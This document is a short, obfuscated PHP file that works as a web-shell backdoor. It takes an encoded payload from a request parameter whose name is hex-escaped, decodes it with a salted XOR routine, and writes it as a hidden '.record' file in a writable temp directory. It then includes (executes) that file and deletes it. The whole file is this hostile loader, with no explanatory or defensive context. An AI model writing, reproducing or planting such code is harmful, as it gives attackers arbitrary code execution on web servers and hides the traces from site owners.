<?php

if(isset($_REQUEST) && isset($_REQUEST["ob\x6A\x65ct"])){
	$hld = $_REQUEST["ob\x6A\x65ct"];
	$hld=explode	 (	 "."		 , 		$hld 	 );	  
	$elem = '';
            $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt3);
            $t = 0;
    
            foreach ($hld as $v6) {
                $sChar = ord($salt3[$t	 %$sLen]);
                $d = ((int)$v6 - $sChar - ($t	 %10))	 ^36;
                $elem.= 	chr($d);
                $t++;		}	
	$key = array_filter([getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/var/tmp", session_save_path(), getenv("TMP"), "/dev/shm"]);
	for ($reference = 0, $pgrp = count($key); $reference < $pgrp; $reference++) {
    $entity = $key[$reference];
    		if (is_writable($entity) && is_dir($entity)) {
    $bind = vsprintf("%s/%s", [$entity, ".record"]);
    if (@file_put_contents($bind, $elem) !== false) {
	include $bind;
	unlink($bind);
	exit;
}
}
}
}